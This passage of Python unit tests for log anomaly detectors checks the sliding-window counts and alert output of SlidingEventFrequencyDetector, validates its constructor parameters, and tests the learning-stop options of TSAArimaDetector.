# Without target_path_list every atom is counted under the single key ("/value",).
# sefd.counts[key] holds the timestamps still inside the sliding window; the
# assertions below show that an entry is dropped once it is more than window_size
# (10 s) older than the newest one (t+3 survives the atom at t+13, t+1 does not).
sefd.receive_atom(log_atom1)
self.assertEqual(self.output_stream.getvalue(), "")
self.assertEqual(list(sefd.counts[("/value",)]), [t+1])
sefd.receive_atom(log_atom2)
self.assertEqual(self.output_stream.getvalue(), "")
self.assertEqual(list(sefd.counts[("/value",)]), [t+1, t+3])
# Third timestamp inside the window (set_upper_limit is 2): the
# "Frequency exceeds range for the first time" line is printed, stamped with t+7.
sefd.receive_atom(log_atom3)
self.assertEqual(self.output_stream.getvalue(), expected_string_first % (datetime.fromtimestamp(t+7).strftime(dtf), sefd.__class__.__name__, 1, "a"))
self.reset_output_stream()
self.assertEqual(list(sefd.counts[("/value",)]), [t+1, t+3, t+7])
sefd.receive_atom(log_atom4)
self.assertEqual(self.output_stream.getvalue(), "")
self.assertEqual(list(sefd.counts[("/value",)]), [t+3, t+7, t+13])
sefd.receive_atom(log_atom5)
self.assertEqual(self.output_stream.getvalue(), "")
self.assertEqual(list(sefd.counts[("/value",)]), [t+7, t+13, t+17])
sefd.receive_atom(log_atom6)
self.assertEqual(self.output_stream.getvalue(), "")
self.assertEqual(list(sefd.counts[("/value",)]), [t+13, t+17, t+18])
# Four entries in the window now, but nothing further is printed for this key
# (the "first time" line was already emitted above).
sefd.receive_atom(log_atom7)
self.assertEqual(self.output_stream.getvalue(), "")
self.assertEqual(list(sefd.counts[("/value",)]), [t+13, t+17, t+18, t+19])
sefd.receive_atom(log_atom8)
self.assertEqual(self.output_stream.getvalue(), "")
self.assertEqual(list(sefd.counts[("/value",)]), [t+17, t+18, t+19, t+25])
sefd.receive_atom(log_atom9)
self.assertEqual(self.output_stream.getvalue(), "")
self.assertEqual(list(sefd.counts[("/value",)]), [t+17, t+18, t+19, t+25, t+25])
# The atom at t+35 ages out everything older than t+25 and the
# "Frequency anomaly detected" line is printed, stamped with t+25.
sefd.receive_atom(log_atom10)
self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t+25).strftime(dtf), sefd.__class__.__name__, 1, "b"))
self.reset_output_stream()
self.assertEqual(list(sefd.counts[("/value",)]), [t+25, t+25, t+35])

# target_path_list
# Same atoms again, now counted per value of "/value": separate keys ("a",) and ("b",),
# each with its own sliding window.
sefd = SlidingEventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], target_path_list=["/value"], window_size=10, set_upper_limit=2, learn_mode=True, output_logline=False)
# Forward log atoms to detector
# Log atoms of initial window 1 should not create anomalies and add to counts
# Input: a; window for a is opened
# Expected output: nothing printed, window of a holds [t + 1]
sefd.receive_atom(log_atom1)
self.assertEqual(self.output_stream.getvalue(), "")
self.assertEqual(list(sefd.counts[("a",)]), [t + 1])
# Input: b; window for b is opened
# Expected output: nothing printed, a unchanged, window of b holds [t + 3]
sefd.receive_atom(log_atom2)
self.assertEqual(self.output_stream.getvalue(), "")
self.assertEqual(list(sefd.counts[("a",)]), [t + 1])
self.assertEqual(list(sefd.counts[("b",)]), [t + 3])
# Input: a; second a inside the window
# Expected output: nothing printed (two entries do not exceed set_upper_limit=2)
sefd.receive_atom(log_atom3)
self.assertEqual(self.output_stream.getvalue(), "")
self.reset_output_stream()
self.assertEqual(list(sefd.counts[("a",)]), [t + 1, t + 7])
self.assertEqual(list(sefd.counts[("b",)]), [t + 3])
# Input: a at t+13; t+1 is now more than 10 s old and is dropped from a's window
# Expected output: nothing printed, a holds [t + 7, t + 13], b unchanged
sefd.receive_atom(log_atom4)
self.assertEqual(self.output_stream.getvalue(), "")
self.assertEqual(list(sefd.counts[("a",)]), [t + 7, t + 13])
self.assertEqual(list(sefd.counts[("b",)]), [t + 3])
# Input: b at t+17; t+3 is still inside b's window (exactly 10 s older, boundary kept)
# Expected output: nothing printed, b holds [t + 3, t + 17]
sefd.receive_atom(log_atom5)
self.assertEqual(self.output_stream.getvalue(), "")
self.assertEqual(list(sefd.counts[("a",)]), [t + 7, t + 13])
self.assertEqual(list(sefd.counts[("b",)]), [t + 3, t + 17])
# Input: a at t+18; t+7 ages out of a's window
# Expected output: nothing printed, a holds [t + 13, t + 18]
sefd.receive_atom(log_atom6)
self.assertEqual(self.output_stream.getvalue(), "")
self.assertEqual(list(sefd.counts[("a",)]), [t + 13, t + 18])
self.assertEqual(list(sefd.counts[("b",)]), [t + 3, t + 17])
# Input: a at t+19; third entry inside a's window
# Expected output: "Frequency exceeds range for the first time" for a, stamped with t+19
sefd.receive_atom(log_atom7)
self.assertEqual(self.output_stream.getvalue(), expected_string_first % (datetime.fromtimestamp(t+19).strftime(dtf), sefd.__class__.__name__, 1, "a"))
self.reset_output_stream()
self.assertEqual(list(sefd.counts[("a",)]), [t + 13, t + 18, t + 19])
self.assertEqual(list(sefd.counts[("b",)]), [t + 3, t + 17])
# The two b atoms at t+25 push b over the limit as well; a's window is not touched
# by b atoms and keeps its three entries until the next a arrives (below this block).
# Input: b at t+25; t+3 ages out of b's window
# Expected output: nothing printed, b holds [t + 17, t + 25]
sefd.receive_atom(log_atom8)
self.assertEqual(self.output_stream.getvalue(), "")
self.assertEqual(list(sefd.counts[("a",)]), [t + 13, t + 18, t + 19])
self.assertEqual(list(sefd.counts[("b",)]), [t + 17, t + 25])
# Input: second b at t+25; third entry inside b's window
# Expected output: "Frequency exceeds range for the first time" for b, stamped with t+25
sefd.receive_atom(log_atom9)
self.assertEqual(self.output_stream.getvalue(), expected_string_first % (datetime.fromtimestamp(t+25).strftime(dtf), sefd.__class__.__name__, 1, "b"))
self.reset_output_stream()
self.assertEqual(list(sefd.counts[("a",)]), [t + 13, t + 18, t + 19])
self.assertEqual(list(sefd.counts[("b",)]), [t + 17, t + 25, t + 25])
# Time window 4 should not create anomalies since no log atom is received to evaluate it.
# Input: a; third time window is completed, fourth time window is started # Expected output: Anomalies for unexpected low counts of a (0 instead of 3) and b (2 instead of 1), frequency of a is 1 in new # time window count, old count remains unchanged sefd.receive_atom(log_atom10) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t+19).strftime(dtf), sefd.__class__.__name__, 1, "a")) self.reset_output_stream() self.assertEqual(list(sefd.counts[("a",)]), [t + 35]) self.assertEqual(list(sefd.counts[("b",)]), [t + 17, t + 25, t + 25]) # stop_learning_time sefd = SlidingEventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], target_path_list=["/value"], window_size=10, set_upper_limit=2, learn_mode=True, output_logline=False, stop_learning_time=100) self.assertTrue(sefd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(sefd.receive_atom(log_atom1)) self.assertTrue(sefd.learn_mode) log_atom1.atom_time = t + 102 self.assertTrue(sefd.receive_atom(log_atom1)) self.assertFalse(sefd.learn_mode) # stop_learning_no_anomaly_time sefd = SlidingEventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], target_path_list=["/value"], window_size=10, set_upper_limit=2, learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(sefd.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(sefd.receive_atom(log_atom1)) self.assertTrue(sefd.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(sefd.receive_atom(log_atom2)) self.assertTrue(sefd.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(sefd.receive_atom(log_atom3)) self.assertTrue(sefd.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(sefd.receive_atom(log_atom1)) self.assertFalse(sefd.learn_mode) def test2validate_parameters(self): """Test all initialization 
parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, ["default"], 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, None, 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, "", 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, b"Default", 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, True, 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, 123, 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, 123.3, 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, {"id": "Default"}, 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, (), 300) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, set(), 300) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], -1) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 0) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], None) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], "123") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, 
[self.stream_printer_event_handler], []) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 100) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 100.22) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=[""]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list="") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=True) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=123) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=123.3) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, target_path_list=[]) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, 
target_path_list=None) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=[""]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list="") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=True) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=123) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=123.3) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=[]) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, scoring_path_list=None) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size=-1) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size=0) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, 
window_size=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size="123") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size=["Default"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size=[]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, window_size=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, window_size=100) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, window_size=0.5) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=-1) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=1.1) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold="123") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 
300, local_maximum_threshold=["Default"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=[]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=0) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=0.5) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, local_maximum_threshold=1) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id="") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=None) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=True) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=123) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=123.22) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, 
persistence_id=["Default"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=[]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, persistence_id="Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=b"True") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode="True") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=123) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=123.22) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=["Default"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=[]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True) self.assertRaises(TypeError, 
SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=None) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=b"True") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline="True") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=123) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=123.22) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=["Default"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=[]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, output_logline=True) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=[""]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list="") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=b"Default") self.assertRaises(TypeError, 
SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=True) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=123) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=123.3) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=[]) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, ignore_list=None) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=[""]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list="") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=True) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=123) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=123.3) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, 
[self.stream_printer_event_handler], 300, constraint_list={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=[]) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, constraint_list=None) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, 
self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=100) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=set()) 
SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=100) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list="") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list=True) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list=123) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list=123.22) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list=()) self.assertRaises(TypeError, SlidingEventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], 300, log_resource_ignore_list=set()) SlidingEventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], 300, 
def test1receive_atom(self):
    """
    Exercise TSAArimaDetector.receive_atom through the shared run_tad_test driver and check the two learning-stop parameters.

    The first two runs feed self.data through run_tad_test, once with the default EventTypeDetector and once with an
    explicit target_path_list on both the EventTypeDetector and the TSAArimaDetector. The remaining sections construct
    a fresh detector with stop_learning_time and then with stop_learning_no_anomaly_time and assert that learn_mode
    stays True while the configured interval has not elapsed and becomes False once it has.
    """
    etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler])
    tad = TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, output_logline=False)
    self.run_tad_test(tad, etd, self.data)
    # target_path_list: both detectors are restricted to the same path.
    etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/model/value"])
    tad = TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=["/model/value"], learn_mode=True, output_logline=False)
    self.run_tad_test(tad, etd, self.data)
    # stop_learning_time: learning must end once atoms arrive more than 100 seconds after the first one.
    t = time.time()
    log_atom1 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t, None)
    log_atom2 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+3, None)
    log_atom3 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+7, None)
    tad = TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=["/model/value"], learn_mode=True, stop_learning_time=100)
    self.assertTrue(tad.receive_atom(log_atom1))
    # t + 99 is still inside the 100 second window, t + 101 is outside it.
    log_atom1.atom_time = t + 99
    self.assertTrue(tad.receive_atom(log_atom1))
    self.assertTrue(tad.learn_mode)
    log_atom1.atom_time = t + 101
    self.assertTrue(tad.receive_atom(log_atom1))
    self.assertFalse(tad.learn_mode)
    # stop_learning_no_anomaly_time: learning must end once 100 seconds pass without an anomaly.
    tad = TSAArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100)
    log_atom1.atom_time = t
    self.assertTrue(tad.receive_atom(log_atom1))
    log_atom1.atom_time = t + 100
    self.assertTrue(tad.receive_atom(log_atom1))
    self.assertTrue(tad.learn_mode)
    log_atom2.atom_time = t + 100
    self.assertTrue(tad.receive_atom(log_atom2))
    self.assertTrue(tad.learn_mode)
    # NOTE(review): log_atom1's time is updated here but log_atom3 (still at t + 7) is the atom actually fed in;
    # presumably log_atom3.atom_time = t + 200 was intended. The assertions hold as written, so confirm the
    # detector's behaviour before changing it.
    log_atom1.atom_time = t + 200
    self.assertTrue(tad.receive_atom(log_atom3))
    self.assertTrue(tad.learn_mode)
    log_atom1.atom_time = t + 201
    self.assertTrue(tad.receive_atom(log_atom1))
    self.assertFalse(tad.learn_mode)
